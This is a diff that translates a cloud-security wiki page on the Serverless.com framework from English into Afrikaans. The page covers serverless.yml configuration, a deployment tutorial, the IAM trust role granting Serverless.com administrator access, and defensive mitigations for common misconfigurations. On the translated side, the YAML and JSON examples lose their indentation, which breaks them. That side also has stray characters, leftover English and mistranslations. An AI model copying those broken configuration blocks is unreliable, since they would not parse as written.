+ +Veranderlikes en Aangepaste Veranderlikes + +**Veranderlikes** stel dinamiese konfigurasie in staat deur die gebruik van plekhouers wat by ontplooiingstyd opgelos word. + +- **Sintaksis:** `${variable}` sintaksis kan omgewingveranderlikes, lĂȘerinhoud of ander konfigurasieparameters verwys. + +```yaml +functions: +hello: +handler: handler.hello +environment: +TABLE_NAME: ${self:custom.tableName} +``` + +* **Aangepaste Veranderlikes:** Die `custom` afdeling word gebruik om gebruikerspesifieke veranderlikes en konfigurasies te definieer wat regdeur die `serverless.yml` hergebruik kan word. + +```yaml +custom: +tableName: my-dynamodb-table +stage: ${opt:stage, 'dev'} ```
-Variables and Custom Variables - -**Variables** enable dynamic configuration by allowing the use of placeholders that are resolved at deployment time. - -- **Syntax:** `${variable}` syntax can reference environment variables, file contents, or other configuration parameters. - - ```yaml - functions: - hello: - handler: handler.hello - environment: - TABLE_NAME: ${self:custom.tableName} - ``` - -* **Custom Variables:** The `custom` section is used to define user-specific variables and configurations that can be reused throughout the `serverless.yml`. - - ```yaml - custom: - tableName: my-dynamodb-table - stage: ${opt:stage, 'dev'} - ``` - -
- -
- -Outputs - -**Outputs** define the values that are returned after a service is deployed, such as resource ARNs, endpoints, or other useful information. They are specified under the `outputs` section and often used to expose information to other services or for easy access post-deployment. +Uitsette +**Uitsette** definieer die waardes wat teruggegee word nadat 'n diens ontplooi is, soos hulpbron ARNs, eindpunte, of ander nuttige inligting. Hulle word onder die `outputs` afdeling gespesifiseer en word dikwels gebruik om inligting aan ander dienste bloot te stel of vir maklike toegang na ontplooiing. ```yaml ÂĄoutputs: - ApiEndpoint: - Description: "API Gateway endpoint URL" - Value: - Fn::Join: - - "" - - - "https://" - - Ref: ApiGatewayRestApi - - ".execute-api." - - Ref: AWS::Region - - ".amazonaws.com/" - - Ref: AWS::Stage +ApiEndpoint: +Description: "API Gateway endpoint URL" +Value: +Fn::Join: +- "" +- - "https://" +- Ref: ApiGatewayRestApi +- ".execute-api." +- Ref: AWS::Region +- ".amazonaws.com/" +- Ref: AWS::Stage ``` -
-IAM Roles and Permissions - -**IAM Roles and Permissions** define the security credentials and access rights for your functions and other resources. They are managed under the `provider` or individual function settings to specify necessary permissions. +IAM Rolle en Toestemmings +**IAM Rolle en Toestemmings** definieer die sekuriteitsakkredite en toegangregte vir jou funksies en ander hulpbronne. Hulle word bestuur onder die `provider` of individuele funksie-instellings om nodige toestemmings te spesifiseer. ```yaml provider: - [...] - iam: - role: - statements: - - Effect: 'Allow' - Action: - - 'dynamodb:PutItem' - - 'dynamodb:Get*' - - 'dynamodb:Scan*' - - 'dynamodb:UpdateItem' - - 'dynamodb:DeleteItem' - Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} +[...] +iam: +role: +statements: +- Effect: 'Allow' +Action: +- 'dynamodb:PutItem' +- 'dynamodb:Get*' +- 'dynamodb:Scan*' +- 'dynamodb:UpdateItem' +- 'dynamodb:DeleteItem' +Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} ``` -
-Environment Variables - -**Variables** allow you to pass configuration settings and secrets to your functions without hardcoding them. They are defined under the `environment` section for either the provider or individual functions. +Omgewing Veranderlikes +**Veranderlikes** stel jou in staat om konfigurasie-instellings en geheime inligting aan jou funksies oor te dra sonder om dit hard te kodifiseer. Hulle word gedefinieer onder die `environment` afdeling vir Ăłf die verskaffer Ăłf individuele funksies. ```yaml provider: - environment: - STAGE: ${self:provider.stage} +environment: +STAGE: ${self:provider.stage} functions: - hello: - handler: handler.hello - environment: - TABLE_NAME: ${self:custom.tableName} +hello: +handler: handler.hello +environment: +TABLE_NAME: ${self:custom.tableName} ``` -
-Dependencies - -**Dependencies** manage the external libraries and modules your functions require. They typically handled via package managers like npm or pip, and bundled with your deployment package using tools or plugins like `serverless-webpack`. +Afhangighede +**Afhangighede** bestuur die eksterne biblioteke en modules wat jou funksies benodig. Hulle word tipies hanteer deur middel van pakketbestuurders soos npm of pip, en saamgepak met jou ontplooiingspakket met behulp van gereedskap of plugins soos `serverless-webpack`. ```yaml plugins: - - serverless-webpack +- serverless-webpack ``` -
Hooks -**Hooks** allow you to run custom scripts or commands at specific points in the deployment lifecycle. They are defined using plugins or within the `serverless.yml` to perform actions before or after deployments. - +**Hooks** stel jou in staat om pasgemaakte skripte of opdragte op spesifieke punte in die ontplooiing lewensiklus uit te voer. Hulle word gedefinieer met behulp van plugins of binne die `serverless.yml` om aksies voor of na ontplooiings uit te voer. ```yaml custom: - hooks: - before:deploy:deploy: echo "Starting deployment..." +hooks: +before:deploy:deploy: echo "Starting deployment..." ``` -
### Tutorial -This is a summary of the official tutorial [**from the docs**](https://www.serverless.com/framework/docs/tutorial): - -1. Create an AWS account (Serverless.com start in AWS infrastructure) -2. Create an account in serverless.com -3. Create an app: +Dit is 'n opsomming van die amptelike tutoriaal [**uit die dokumentasie**](https://www.serverless.com/framework/docs/tutorial): +1. Skep 'n AWS-rekening (Serverless.com begin in AWS-infrastruktuur) +2. Skep 'n rekening in serverless.com +3. Skep 'n app: ```bash # Create temp folder for the tutorial mkdir /tmp/serverless-tutorial @@ -313,26 +284,22 @@ serverless #Choose first one (AWS / Node.js / HTTP API) ## Create A New App ## Indicate a name like "tutorialapp) ``` - -This should have created an **app** called `tutorialapp` that you can check in [serverless.com](serverless.com-security.md) and a folder called `Tutorial` with the file **`handler.js`** containing some JS code with a `helloworld` code and the file **`serverless.yml`** declaring that function: +Dit behoort 'n **app** genaamd `tutorialapp` te geskep het wat jy kan nagaan in [serverless.com](serverless.com-security.md) en 'n gids genaamd `Tutorial` met die lĂȘer **`handler.js`** wat 'n paar JS-kode bevat met 'n `helloworld` kode en die lĂȘer **`serverless.yml`** wat daardie funksie verklaar: {{#tabs }} {{#tab name="handler.js" }} - ```javascript exports.hello = async (event) => { - return { - statusCode: 200, - body: JSON.stringify({ - message: "Go Serverless v4! Your function executed successfully!", - }), - } +return { +statusCode: 200, +body: JSON.stringify({ +message: "Go Serverless v4! Your function executed successfully!", +}), +} } ``` - {{#endtab }} {{#tab name="serverless.yml" }} - ```yaml # "org" ensures this Service is used with the correct Serverless Framework Access Key. org: testing12342 
@@ -342,130 +309,122 @@ app: tutorialapp service: Tutorial provider: - name: aws - runtime: nodejs20.x +name: aws +runtime: nodejs20.x functions: - hello: - handler: handler.hello - events: - - httpApi: - path: / - method: get +hello: +handler: handler.hello +events: +- httpApi: +path: / +method: get ``` - {{#endtab }} {{#endtabs }} -4. Create an AWS provider, going in the **dashboard** in `https://app.serverless.com//settings/providers?providerId=new&provider=aws`. - 1. To give `serverless.com` access to AWS It will ask to run a cloudformation stack using this config file (at the time of this writing): [https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml) - 2. This template generates a role called **`SFRole-`** with **`arn:aws:iam::aws:policy/AdministratorAccess`** over the account with a Trust Identity that allows `Serverless.com` AWS account to access the role. +4. Skep 'n AWS verskaffer deur in die **dashboard** te gaan op `https://app.serverless.com//settings/providers?providerId=new&provider=aws`. +1. Om `serverless.com` toegang tot AWS te gee, sal dit vra om 'n cloudformation-stapel te loop met hierdie konfigurasie-lĂȘer (op die tyd van hierdie skrywe): [https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml) +2. Hierdie sjabloon genereer 'n rol genaamd **`SFRole-`** met **`arn:aws:iam::aws:policy/AdministratorAccess`** oor die rekening met 'n Trust Identity wat `Serverless.com` AWS-rekening toelaat om toegang tot die rol te verkry.
Yaml roleTemplate - ```yaml Description: This stack creates an IAM role that can be used by Serverless Framework for use in deployments. Resources: - SFRole: - Type: AWS::IAM::Role - Properties: - AssumeRolePolicyDocument: - Version: "2012-10-17" - Statement: - - Effect: Allow - Principal: - AWS: arn:aws:iam::486128539022:root - Action: - - sts:AssumeRole - Condition: - StringEquals: - sts:ExternalId: !Sub "ServerlessFramework-${OrgUid}" - Path: / - RoleName: !Ref RoleName - ManagedPolicyArns: - - arn:aws:iam::aws:policy/AdministratorAccess - ReporterFunction: - Type: Custom::ServerlessFrameworkReporter - Properties: - ServiceToken: "arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec" - OrgUid: !Ref OrgUid - RoleArn: !GetAtt SFRole.Arn - Alias: !Ref Alias +SFRole: +Type: AWS::IAM::Role +Properties: +AssumeRolePolicyDocument: +Version: "2012-10-17" +Statement: +- Effect: Allow +Principal: +AWS: arn:aws:iam::486128539022:root +Action: +- sts:AssumeRole +Condition: +StringEquals: +sts:ExternalId: !Sub "ServerlessFramework-${OrgUid}" +Path: / +RoleName: !Ref RoleName +ManagedPolicyArns: +- arn:aws:iam::aws:policy/AdministratorAccess +ReporterFunction: +Type: Custom::ServerlessFrameworkReporter +Properties: +ServiceToken: "arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec" +OrgUid: !Ref OrgUid +RoleArn: !GetAtt SFRole.Arn +Alias: !Ref Alias Outputs: - SFRoleArn: - Description: "ARN for the IAM Role used by Serverless Framework" - Value: !GetAtt SFRole.Arn +SFRoleArn: +Description: "ARN for the IAM Role used by Serverless Framework" +Value: !GetAtt SFRole.Arn Parameters: - OrgUid: - Description: Serverless Framework Org Uid - Type: String - Alias: - Description: Serverless Framework Provider Alias - Type: String - RoleName: - Description: Serverless Framework Role Name - Type: String +OrgUid: +Description: Serverless Framework Org Uid +Type: String +Alias: 
+Description: Serverless Framework Provider Alias +Type: String +RoleName: +Description: Serverless Framework Role Name +Type: String ``` -
-Trust Relationship - +Vertrouensverhouding ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::486128539022:root" - }, - "Action": "sts:AssumeRole", - "Condition": { - "StringEquals": { - "sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb" - } - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::486128539022:root" +}, +"Action": "sts:AssumeRole", +"Condition": { +"StringEquals": { +"sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb" +} +} +} +] } ``` -
-5. The tutorial asks to create the file `createCustomer.js` which will basically create a new API endpoint handled by the new JS file and asks to modify the `serverless.yml` file to make it generate a **new DynamoDB table**, define an **environment variable**, the role that will be using the generated lambdas. +5. Die tutoriaal vra om die lĂȘer `createCustomer.js` te skep wat basies 'n nuwe API-eindpunt sal skep wat deur die nuwe JS-lĂȘer hanteer word en vra om die `serverless.yml`-lĂȘer te wysig om dit te laat genereer 'n **nuwe DynamoDB-tabel**, 'n **omgewing veranderlike** te definieer, die rol wat die gegenereerde lambdas sal gebruik. {{#tabs }} {{#tab name="createCustomer.js" }} - ```javascript "use strict" const AWS = require("aws-sdk") module.exports.createCustomer = async (event) => { - const body = JSON.parse(Buffer.from(event.body, "base64").toString()) - const dynamoDb = new AWS.DynamoDB.DocumentClient() - const putParams = { - TableName: process.env.DYNAMODB_CUSTOMER_TABLE, - Item: { - primary_key: body.name, - email: body.email, - }, - } - await dynamoDb.put(putParams).promise() - return { - statusCode: 201, - } +const body = JSON.parse(Buffer.from(event.body, "base64").toString()) +const dynamoDb = new AWS.DynamoDB.DocumentClient() +const putParams = { +TableName: process.env.DYNAMODB_CUSTOMER_TABLE, +Item: { +primary_key: body.name, +email: body.email, +}, +} +await dynamoDb.put(putParams).promise() +return { +statusCode: 201, +} } ``` - {{#endtab }} {{#tab name="serverless.yml" }} - ```yaml # "org" ensures this Service is used with the correct Serverless Framework Access Key. org: testing12342 
@@ -475,388 +434,379 @@ app: tutorialapp service: Tutorial provider: - name: aws - runtime: nodejs20.x - environment: - DYNAMODB_CUSTOMER_TABLE: ${self:service}-customerTable-${sls:stage} - iam: - role: - statements: - - Effect: "Allow" - Action: - - "dynamodb:PutItem" - - "dynamodb:Get*" - - "dynamodb:Scan*" - - "dynamodb:UpdateItem" - - "dynamodb:DeleteItem" - Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} +name: aws +runtime: nodejs20.x +environment: +DYNAMODB_CUSTOMER_TABLE: ${self:service}-customerTable-${sls:stage} +iam: +role: +statements: +- Effect: "Allow" +Action: +- "dynamodb:PutItem" +- "dynamodb:Get*" +- "dynamodb:Scan*" +- "dynamodb:UpdateItem" +- "dynamodb:DeleteItem" +Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} functions: - hello: - handler: handler.hello - events: - - httpApi: - path: / - method: get - createCustomer: - handler: createCustomer.createCustomer - events: - - httpApi: - path: / - method: post +hello: +handler: handler.hello +events: +- httpApi: +path: / +method: get +createCustomer: +handler: createCustomer.createCustomer +events: +- httpApi: +path: / +method: post resources: - Resources: - CustomerTable: - Type: AWS::DynamoDB::Table - Properties: - AttributeDefinitions: - - AttributeName: primary_key - AttributeType: S - BillingMode: PAY_PER_REQUEST - KeySchema: - - AttributeName: primary_key - KeyType: HASH - TableName: ${self:service}-customerTable-${sls:stage} +Resources: +CustomerTable: +Type: AWS::DynamoDB::Table +Properties: +AttributeDefinitions: +- AttributeName: primary_key +AttributeType: S +BillingMode: PAY_PER_REQUEST +KeySchema: +- AttributeName: primary_key +KeyType: HASH +TableName: ${self:service}-customerTable-${sls:stage} ``` - {{#endtab }} {{#endtabs }} -6. Deploy it running **`serverless deploy`** - 1. The deployment will be performed via a CloudFormation Stack - 2. 
Note that the **lambdas are exposed via API gateway** and not via direct URLs -7. **Test it** - 1. The previous step will print the **URLs** where your API endpoints lambda functions have been deployed +6. Ontplooi dit met **`serverless deploy`** +1. Die ontplooiing sal uitgevoer word deur 'n CloudFormation Stack +2. Let daarop dat die **lambdas blootgestel word via API gateway** en nie via direkte URL's nie +7. **Toets dit** +1. Die vorige stap sal die **URL's** druk waar jou API eindpunte lambda funksies ontplooi is -## Security Review of Serverless.com +## Sekuriteitsherziening van Serverless.com -### **Misconfigured IAM Roles and Permissions** +### **Verkeerd geconfigureerde IAM Rolle en Toestemmings** -Overly permissive IAM roles can grant unauthorized access to cloud resources, leading to data breaches or resource manipulation. +Oormatig permissiewe IAM rolle kan ongeoorloofde toegang tot wolkbronne verleen, wat lei tot datalekke of bronmanipulasie. -When no permissions are specified for the a Lambda function, a role with permissions only to generate logs will be created, like: +Wanneer geen toestemmings vir 'n Lambda funksie gespesifiseer word nie, sal 'n rol met toestemmings slegs om logs te genereer, geskep word, soos:
-Minimum lambda permissions - +Minimum lambda toestemmings ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Action": [ - "logs:CreateLogStream", - "logs:CreateLogGroup", - "logs:TagResource" - ], - "Resource": [ - "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*" - ], - "Effect": "Allow" - }, - { - "Action": ["logs:PutLogEvents"], - "Resource": [ - "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*" - ], - "Effect": "Allow" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Action": [ +"logs:CreateLogStream", +"logs:CreateLogGroup", +"logs:TagResource" +], +"Resource": [ +"arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*" +], +"Effect": "Allow" +}, +{ +"Action": ["logs:PutLogEvents"], +"Resource": [ +"arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*" +], +"Effect": "Allow" +} +] } ``` -
-#### **Mitigation Strategies** +#### **VersagingsstrategieĂ«** -- **Principle of Least Privilege:** Assign only necessary permissions to each function. - - ```yaml - provider: - [...] - iam: - role: - statements: - - Effect: 'Allow' - Action: - - 'dynamodb:PutItem' - - 'dynamodb:Get*' - - 'dynamodb:Scan*' - - 'dynamodb:UpdateItem' - - 'dynamodb:DeleteItem' - Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} - ``` - -- **Use Separate Roles:** Differentiate roles based on function requirements. - ---- - -### **Insecure Secrets and Configuration Management** - -Storing sensitive information (e.g., API keys, database credentials) directly in **`serverless.yml`** or code can lead to exposure if repositories are compromised. - -The **recommended** way to store environment variables in **`serverless.yml`** file from serverless.com (at the time of this writing) is to use the `ssm` or `s3` providers, which allows to get the **environment values from these sources at deployment time** and **configure** the **lambdas** environment variables with the **text clear of the values**! - -> [!CAUTION] -> Therefore, anyone with permissions to read the lambdas configuration inside AWS will be able to **access all these environment variables in clear text!** - -For example, the following example will use SSM to get an environment variable: +- **Beginsel van Minste Bevoegdheid:** Ken slegs die nodige toestemmings aan elke funksie toe. ```yaml provider: - environment: - DB_PASSWORD: ${ssm:/aws/reference/secretsmanager/my-db-password~true} +[...] 
+iam: +role: +statements: +- Effect: 'Allow' +Action: +- 'dynamodb:PutItem' +- 'dynamodb:Get*' +- 'dynamodb:Scan*' +- 'dynamodb:UpdateItem' +- 'dynamodb:DeleteItem' +Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} ``` -And even if this prevents hardcoding the environment variable value in the **`serverless.yml`** file, the value will be obtained at deployment time and will be **added in clear text inside the lambda environment variable**. +- **Gebruik Afsonderlike Rolle:** Verskaf rolle gebaseer op funksievereistes. + +--- + +### **Onveilige Geheime en Konfigurasiebestuur** + +Die stoor van sensitiewe inligting (bv. API-sleutels, databasisbewyse) direk in **`serverless.yml`** of kode kan lei tot blootstelling as repositories gecompromitteer word. + +Die **aanbevole** manier om omgewing veranderlikes in **`serverless.yml`** lĂȘer van serverless.com (ten tyde van hierdie skrywe) te stoor, is om die `ssm` of `s3` verskaffers te gebruik, wat toelaat om die **omgewing waardes van hierdie bronne tydens ontplooiing te verkry** en **konfigureer** die **lambdas** omgewing veranderlikes met die **tekst duidelik van die waardes**! + +> [!CAUTION] +> Daarom sal enigeen met toestemmings om die lambdas konfigurasie binne AWS te lees, in staat wees om **toegang te verkry tot al hierdie omgewing veranderlikes in duidelike teks!** + +Byvoorbeeld, die volgende voorbeeld sal SSM gebruik om 'n omgewing veranderlike te verkry: +```yaml +provider: +environment: +DB_PASSWORD: ${ssm:/aws/reference/secretsmanager/my-db-password~true} +``` +And selfs al dit hardcoding van die omgewing veranderlike waarde in die **`serverless.yml`** lĂȘer voorkom, sal die waarde tydens ontplooiing verkry word en sal dit **in duidelike teks binne die lambda omgewing veranderlike bygevoeg word**. 
> [!TIP] -> The recommended way to store environment variables using serveless.com would be to **store it in a AWS secret** and just store the secret name in the environment variable and the **lambda code should gather it**. +> Die aanbevole manier om omgewing veranderlikes met serveless.com te stoor, is om dit in 'n **AWS geheim** te stoor en net die geheim naam in die omgewing veranderlike te stoor en die **lambda kode moet dit versamel**. -#### **Mitigation Strategies** +#### **Mitigering StrategieĂ«** -- **Secrets Manager Integration:** Use services like **AWS Secrets Manager.** -- **Encrypted Variables:** Leverage Serverless Framework’s encryption features for sensitive data. -- **Access Controls:** Restrict access to secrets based on roles. +- **Secrets Manager Integrasie:** Gebruik dienste soos **AWS Secrets Manager.** +- **Gekodeerde Veranderlikes:** Maak gebruik van die Serverless Framework se kodering funksies vir sensitiewe data. +- **Toegangbeheer:** Beperk toegang tot geheime gebaseer op rolle. --- -### **Vulnerable Code and Dependencies** +### **Kwetsbare Kode en Afhanklikhede** -Outdated or insecure dependencies can introduce vulnerabilities, while improper input handling may lead to code injection attacks. +Verouderde of onveilige afhanklikhede kan kwesbaarhede inbring, terwyl onvanpaste invoerhantering kan lei tot kode-inspuitaanvalle. -#### **Mitigation Strategies** +#### **Mitigering StrategieĂ«** -- **Dependency Management:** Regularly update dependencies and scan for vulnerabilities. +- **Afhanklikheid Bestuur:** Werk afhanklikhede gereeld op en skandeer vir kwesbaarhede. - ```yaml - plugins: - - serverless-webpack - - serverless-plugin-snyk - ``` +```yaml +plugins: +- serverless-webpack +- serverless-plugin-snyk +``` -- **Input Validation:** Implement strict validation and sanitization of all inputs. -- **Code Reviews:** Conduct thorough reviews to identify security flaws. 
-- **Static Analysis:** Use tools to detect vulnerabilities in the codebase. +- **Invoer Validasie:** Implementeer streng validasie en sanitasie van alle invoere. +- **Kode Hersienings:** Voer deeglike hersienings uit om sekuriteitsfoute te identifiseer. +- **Statische Analise:** Gebruik gereedskap om kwesbaarhede in die kodebasis te ontdek. --- -### **Inadequate Logging and Monitoring** +### **Onvoldoende Logging en Monitering** -Without proper logging and monitoring, malicious activities may go undetected, delaying incident response. +Sonder behoorlike logging en monitering kan kwaadwillige aktiwiteite onopgemerk bly, wat die insidentreaksie vertraag. -#### **Mitigation Strategies** +#### **Mitigering StrategieĂ«** -- **Centralized Logging:** Aggregate logs using services like **AWS CloudWatch** or **Datadog**. +- **Gekonsolideerde Logging:** Versamel logs met dienste soos **AWS CloudWatch** of **Datadog**. - ```yaml - plugins: - - serverless-plugin-datadog - ``` +```yaml +plugins: +- serverless-plugin-datadog +``` -- **Enable Detailed Logging:** Capture essential information without exposing sensitive data. -- **Set Up Alerts:** Configure alerts for suspicious activities or anomalies. -- **Regular Monitoring:** Continuously monitor logs and metrics for potential security incidents. +- **Aktiveer Gedetailleerde Logging:** Vang noodsaaklike inligting sonder om sensitiewe data bloot te stel. +- **Stel Waarskuwings Op:** Konfigureer waarskuwings vir verdagte aktiwiteite of afwykings. +- **Gereelde Monitering:** Moniteer logs en metrieke voortdurend vir potensiĂ«le sekuriteitsinsidente. --- -### **Insecure API Gateway Configurations** +### **Onveilige API Gateway Konfigurasies** -Open or improperly secured APIs can be exploited for unauthorized access, Denial of Service (DoS) attacks, or cross-site attacks. +Oop of onvanpaste beveiligde API's kan uitgebuit word vir ongeoorloofde toegang, Denial of Service (DoS) aanvalle, of kruis-web aanvalle. 
-#### **Mitigation Strategies** +#### **Mitigering StrategieĂ«** -- **Authentication and Authorization:** Implement robust mechanisms like OAuth, API keys, or JWT. +- **Outentisering en Magtiging:** Implementeer robuuste meganismes soos OAuth, API sleutels, of JWT. - ```yaml - functions: - hello: - handler: handler.hello - events: - - http: - path: hello - method: get - authorizer: aws_iam - ``` +```yaml +functions: +hello: +handler: handler.hello +events: +- http: +path: hello +method: get +authorizer: aws_iam +``` -- **Rate Limiting and Throttling:** Prevent abuse by limiting request rates. +- **Tarief Beperking en Throttling:** Voorkom misbruik deur versoek tariewe te beperk. - ```yaml - provider: - apiGateway: - throttle: - burstLimit: 200 - rateLimit: 100 - ``` +```yaml +provider: +apiGateway: +throttle: +burstLimit: 200 +rateLimit: 100 +``` -- **Secure CORS Configuration:** Restrict allowed origins, methods, and headers. +- **Veilige CORS Konfigurasie:** Beperk toegelate oorspronge, metodes, en koppe. - ```yaml - functions: - hello: - handler: handler.hello - events: - - http: - path: hello - method: get - cors: - origin: https://yourdomain.com - headers: - - Content-Type - ``` +```yaml +functions: +hello: +handler: handler.hello +events: +- http: +path: hello +method: get +cors: +origin: https://yourdomain.com +headers: +- Content-Type +``` -- **Use Web Application Firewalls (WAF):** Filter and monitor HTTP requests for malicious patterns. +- **Gebruik Webtoepassing Vuurmure (WAF):** Filtreer en monitor HTTP versoeke vir kwaadwillige patrone. --- -### **Insufficient Function Isolation** +### **Onvoldoende Funksie Isolasie** -Shared resources and inadequate isolation can lead to privilege escalations or unintended interactions between functions. +Gedeelde hulpbronne en onvoldoende isolasie kan lei tot voorregverhogings of onbedoelde interaksies tussen funksies. 
-#### **Mitigation Strategies** +#### **Mitigering StrategieĂ«** -- **Isolate Functions:** Assign distinct resources and IAM roles to ensure independent operation. -- **Resource Partitioning:** Use separate databases or storage buckets for different functions. -- **Use VPCs:** Deploy functions within Virtual Private Clouds for enhanced network isolation. +- **Isolasie van Funksies:** Ken unieke hulpbronne en IAM rolle toe om onafhanklike werking te verseker. +- **Hulpbron Partitionering:** Gebruik aparte databasisse of stoor emmers vir verskillende funksies. +- **Gebruik VPC's:** Ontplooi funksies binne Virtuele Privaatskywe vir verbeterde netwerk isolasie. - ```yaml - provider: - vpc: - securityGroupIds: - - sg-xxxxxxxx - subnetIds: - - subnet-xxxxxx - ``` +```yaml +provider: +vpc: +securityGroupIds: +- sg-xxxxxxxx +subnetIds: +- subnet-xxxxxx +``` -- **Limit Function Permissions:** Ensure functions cannot access or interfere with each other’s resources unless explicitly required. +- **Beperk Funksie Toestemmings:** Verseker dat funksies nie toegang het tot of mekaar se hulpbronne kan beĂŻnvloed nie, tensy dit eksplisiet vereis word. --- -### **Inadequate Data Protection** +### **Onvoldoende Data Beskerming** -Unencrypted data at rest or in transit can be exposed, leading to data breaches or tampering. +OngeĂ«ngkodeerde data in rus of in oordrag kan blootgestel word, wat kan lei tot datalekke of vervalsing. -#### **Mitigation Strategies** +#### **Mitigering StrategieĂ«** -- **Encrypt Data at Rest:** Utilize cloud service encryption features. +- **Enkripteer Data in Rus:** Maak gebruik van wolkdienste se enkripsie funksies. 
- ```yaml - resources: - Resources: - MyDynamoDBTable: - Type: AWS::DynamoDB::Table - Properties: - SSESpecification: - SSEEnabled: true - ``` +```yaml +resources: +Resources: +MyDynamoDBTable: +Type: AWS::DynamoDB::Table +Properties: +SSESpecification: +SSEEnabled: true +``` -- **Encrypt Data in Transit:** Use HTTPS/TLS for all data transmissions. -- **Secure API Communication:** Enforce encryption protocols and validate certificates. -- **Manage Encryption Keys Securely:** Use managed key services and rotate keys regularly. +- **Enkripteer Data in Oordrag:** Gebruik HTTPS/TLS vir alle datatransmissies. +- **Veilige API Kommunikasie:** Handhaaf enkripsie protokolle en valideer sertifikate. +- **Bestuur Enkripsie Sleutels Veilig:** Gebruik bestuurde sleutel dienste en draai sleutels gereeld. --- -### **Lack of Proper Error Handling** +### **Gebrek aan Behoorlike Fout Hantering** -Detailed error messages can leak sensitive information about the infrastructure or codebase, while unhandled exceptions may lead to application crashes. +Gedetailleerde foutboodskappe kan sensitiewe inligting oor die infrastruktuur of kodebasis blootstel, terwyl onbehandelde uitsonderings kan lei tot toepassingskrake. -#### **Mitigation Strategies** +#### **Mitigering StrategieĂ«** -- **Generic Error Messages:** Avoid exposing internal details in error responses. +- **Generiese Foutboodskappe:** Vermy die blootstelling van interne besonderhede in fout antwoorde. 
- ```javascript - javascriptCopy code// Example in Node.js - exports.hello = async (event) => { - try { - // Function logic - } catch (error) { - console.error(error); - return { - statusCode: 500, - body: JSON.stringify({ message: 'Internal Server Error' }), - }; - } - }; - ``` +```javascript +javascriptCopy code// Voorbeeld in Node.js +exports.hello = async (event) => { +try { +// Funksie logika +} catch (error) { +console.error(error); +return { +statusCode: 500, +body: JSON.stringify({ message: 'Interne Bediener Fout' }), +}; +} +}; +``` -- **Centralized Error Handling:** Manage and sanitize errors consistently across all functions. -- **Monitor and Log Errors:** Track and analyze errors internally without exposing details to end-users. +- **Gekonsolideerde Fout Hantering:** Bestuur en saniteer foute konsekwent oor alle funksies. +- **Monitor en Log Foute:** Volg en analiseer foute intern sonder om besonderhede aan eindgebruikers bloot te stel. --- -### **Insecure Deployment Practices** +### **Onveilige Ontplooiing Praktyke** -Exposed deployment configurations or unauthorized access to CI/CD pipelines can lead to malicious code deployments or misconfigurations. +Blootgestelde ontplooiing konfigurasies of ongeoorloofde toegang tot CI/CD pype kan lei tot kwaadwillige kode ontplooiings of misconfigurasies. -#### **Mitigation Strategies** +#### **Mitigering StrategieĂ«** -- **Secure CI/CD Pipelines:** Implement strict access controls, multi-factor authentication (MFA), and regular audits. -- **Store Configuration Securely:** Keep deployment files free from hardcoded secrets and sensitive data. -- **Use Infrastructure as Code (IaC) Security Tools:** Employ tools like **Checkov** or **Terraform Sentinel** to enforce security policies. -- **Immutable Deployments:** Prevent unauthorized changes post-deployment by adopting immutable infrastructure practices. 
+- **Veilige CI/CD Pype:** Implementeer streng toegangbeheer, multi-faktor verifikasie (MFA), en gereelde ouditte. +- **Berg Konfigurasie Veilig:** Hou ontplooiing lĂȘers vry van hardgecodeerde geheime en sensitiewe data. +- **Gebruik Infrastruktuur as Kode (IaC) Sekuriteitsgereedskap:** Gebruik gereedskap soos **Checkov** of **Terraform Sentinel** om sekuriteitsbeleide af te dwing. +- **Onveranderlike Ontplooiings:** Voorkom ongeoorloofde veranderinge na ontplooiing deur onveranderlike infrastruktuur praktyke aan te neem. --- -### **Vulnerabilities in Plugins and Extensions** +### **Kwetsbaarhede in Plugins en Uitbreidings** -Using unvetted or malicious third-party plugins can introduce vulnerabilities into your serverless applications. +Die gebruik van ongeĂ«valueerde of kwaadwillige derdeparty plugins kan kwesbaarhede in jou serverless toepassings inbring. -#### **Mitigation Strategies** +#### **Mitigering StrategieĂ«** -- **Vet Plugins Thoroughly:** Assess the security of plugins before integration, favoring those from reputable sources. -- **Limit Plugin Usage:** Use only necessary plugins to minimize the attack surface. -- **Monitor Plugin Updates:** Keep plugins updated to benefit from security patches. -- **Isolate Plugin Environments:** Run plugins in isolated environments to contain potential compromises. +- **Evalueer Plugins Deeglik:** Beoordeel die sekuriteit van plugins voor integrasie, en verkies diĂ© van betroubare bronne. +- **Beperk Plugin Gebruik:** Gebruik slegs noodsaaklike plugins om die aanval oppervlak te minimaliseer. +- **Monitor Plugin Opdaterings:** Hou plugins op datum om voordeel te trek uit sekuriteitsopdaterings. +- **Isolasie van Plugin Omgewings:** Voer plugins in geĂŻsoleerde omgewings uit om potensiĂ«le kompromies te bevat. --- -### **Exposure of Sensitive Endpoints** +### **Blootstelling van Sensitiewe Eindpunte** -Publicly accessible functions or unrestricted APIs can be exploited for 